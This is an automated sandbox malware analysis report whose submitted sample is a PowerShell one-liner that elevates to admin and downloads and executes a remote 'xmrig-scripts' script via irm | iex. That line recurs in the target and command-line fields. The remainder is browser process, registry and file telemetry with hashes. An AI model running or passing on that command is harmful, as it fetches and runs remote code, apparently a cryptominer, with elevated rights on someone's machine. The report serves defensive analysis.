Malware Analysis Report

2025-03-15 00:52

Sample ID 240626-qf6tfayflm
Target http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Tags defense_evasion privilege_escalation
Score 3/10

Analysis Overview

Score 3/10

Threat Level: Likely benign

The file http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex was found to be: Likely benign.

Malicious Activity Summary

defense_evasion privilege_escalation

Access Token Manipulation: Create Process with Token

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Checks processor information in registry

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 13:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 13:13

Reported

2024-06-26 13:46

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1890s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Signatures

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638812360313822" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 4452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 1992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb3ee9ab58,0x7ffb3ee9ab68,0x7ffb3ee9ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2104 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2924 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2944 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4024 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3176 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4520 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4068 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4376 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4672 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4836 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4956 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3176 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb3ed43cb8,0x7ffb3ed43cc8,0x7ffb3ed43cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb3ee9ab58,0x7ffb3ee9ab68,0x7ffb3ee9ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2112 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3184 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3832 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4412 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3968 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4744 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4420 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff7816dae48,0x7ff7816dae58,0x7ff7816dae68

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff7816dae48,0x7ff7816dae58,0x7ff7816dae68

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.0.520122527\8313714" -parentBuildID 20230214051806 -prefsHandle 1800 -prefMapHandle 1792 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {31cb6627-8154-42e2-9e96-ee935a984fee} 488 "\\.\pipe\gecko-crash-server-pipe.488" 1880 209919e6858 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.1.317736062\1917083982" -parentBuildID 20230214051806 -prefsHandle 2392 -prefMapHandle 2388 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a95f4b95-8a35-40b5-9fd9-0b4645be467e} 488 "\\.\pipe\gecko-crash-server-pipe.488" 2404 20985c88458 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.2.1767426331\359570481" -childID 1 -isForBrowser -prefsHandle 2900 -prefMapHandle 3036 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {734fbbc1-eb31-4c65-9ace-532cf7b51b06} 488 "\\.\pipe\gecko-crash-server-pipe.488" 2924 209952e6b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.3.322403414\1449851957" -childID 2 -isForBrowser -prefsHandle 3600 -prefMapHandle 3596 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f56b669a-d7fb-4440-b416-9f3cc639b6ce} 488 "\\.\pipe\gecko-crash-server-pipe.488" 924 20985c3ee58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.4.1359314841\1382869316" -childID 3 -isForBrowser -prefsHandle 5148 -prefMapHandle 5144 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {755abd04-df0e-493a-8897-356cb400fe41} 488 "\\.\pipe\gecko-crash-server-pipe.488" 5104 2099ac44b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.5.640477228\285920231" -childID 4 -isForBrowser -prefsHandle 5100 -prefMapHandle 5128 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1865371-cacd-4d41-a6ed-464c9754b1d8} 488 "\\.\pipe\gecko-crash-server-pipe.488" 5292 2099ac41858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.6.1030590432\1354527057" -childID 5 -isForBrowser -prefsHandle 5556 -prefMapHandle 5552 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {609cfc88-5a71-46ef-8377-e46ed8df502a} 488 "\\.\pipe\gecko-crash-server-pipe.488" 5564 2099ac41b58 tab

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

Network


Files

\??\pipe\crashpad_5032_DFVEYBQNTCMSMXNR

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\f_000001

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\a5405cad-1be2-43f7-bf52-1d242c0e0ce6.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

MD5 cfd2fdfedddc08d2932df2d665e36745
SHA1 b3ddd2ea3ff672a4f0babe49ed656b33800e79d0
SHA256 576cff014b4dea0ff3a0c7a4044503b758bceb6a30c2678a1177446f456a4536
SHA512 394c2f25b002b77fd5c12a4872fd669a0ef10c663b2803eb66e2cdaee48ca386e1f76fe552200535c30b05b7f21091a472a50271cd9620131dfb2317276dbe6c

